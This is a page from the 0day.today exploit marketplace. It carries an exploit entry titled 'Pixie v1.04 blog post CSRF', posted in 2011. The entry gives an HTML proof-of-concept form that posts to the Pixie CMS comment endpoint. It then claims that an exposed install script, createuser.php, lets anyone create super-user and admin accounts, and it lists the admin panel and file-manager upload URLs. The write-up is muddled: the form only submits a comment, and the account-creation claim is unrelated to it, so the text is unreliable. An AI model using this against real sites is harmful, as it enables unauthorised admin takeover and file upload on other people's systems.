[ домой ]  [ private ]  [ 0Day ]  [ discount ]  [ Получить золото ]  [ платформы ]  [ пентест ]  [ поиск ]  [ faq ]  [ контакты ]  [ стиль ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB Official Facebook
0day.today Exploit DB Official Twitter
0day.today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - наибольшая база данных эксплоитов в мире.
Выберите Ваш язык:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Некоторые вещи, о которых стоит знать:

Мы используем один основной домен 0day.today

Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold).
We accept currencies: [contact admin to find more]
           
Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.

Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Я зарегистрированный пользователь 0day.today. Я не желаю видеть это окно в будущем.
С чего начать?
  1. Прочитайте [ соглашение ]
  2. Прочитайте [ Отправить ] правила
  3. Посетите страницу [ faq ] page
  4. [ Зарегистрируйте ] профиль
  5. Получите [ Gold ]
  6. Если Вы хотите [ продать ]
  7. Если Вы хотите [ купить ]
  8. Если Вы потеряли [ Счет ]
  9. Любые вопросы [ [email protected] ]


Основные ссылки


Вы можете связаться с нами по

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ Восстановление ]
Свяжитесь с нами
Вы можете связаться с нами по:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today магазин эксплоитов и 0day база данных эксплоитов

Pixie v1.04 blog post CSRF

Автор
hackme
Риск
[
Security Risk Unsored
]
0day-ID
0day-ID-17272
Категория
web applications
Дата добавления
11-12-2011
Платформа
php
# Exploit Title: Pixie v1.04 blog post CSRF
# Google Dork: # Date: 11-Dec-2011
# Author: hackme
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
# Version: 1.04# Tested on: Linux Ubuntu 10.10
# CVE :
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
[+] Post Method
[+] exploit:
 
<form method="POST" action="http://127.0.0.1/pixie/?s=blog&m=permalink&x=my-first-post">
name: <input type="Text" name="name" id="name" size="15"/><br>
e-mail: <input type="Text" name="email" id="email" size="15"/>
<br>web(optional): <input type="Text" name="web" id="web" size="15"/><br>
comment: <input type="Text" name="comment" id="comment" size="15"/><br>
<input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/>
<input type="Hidden" name="post" id="post" value="1"/></form>

EXPLOIT :

http://site.com/admin/install/createuser.php

+ You can Creat :

- Super user
- Admin
- Client
- User

~ Admin Panel : http://site.com/admin/
~ Upload file : http://site.com/admin/?s=publish&x=filemanager 




#  0day.today [2024-07-02]  #
База данных эксплоитов разделена по типам эксплоитов (локальные, удаленные, DoS, PoC, другие.)
Отправляйте все пожелания на адреса mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team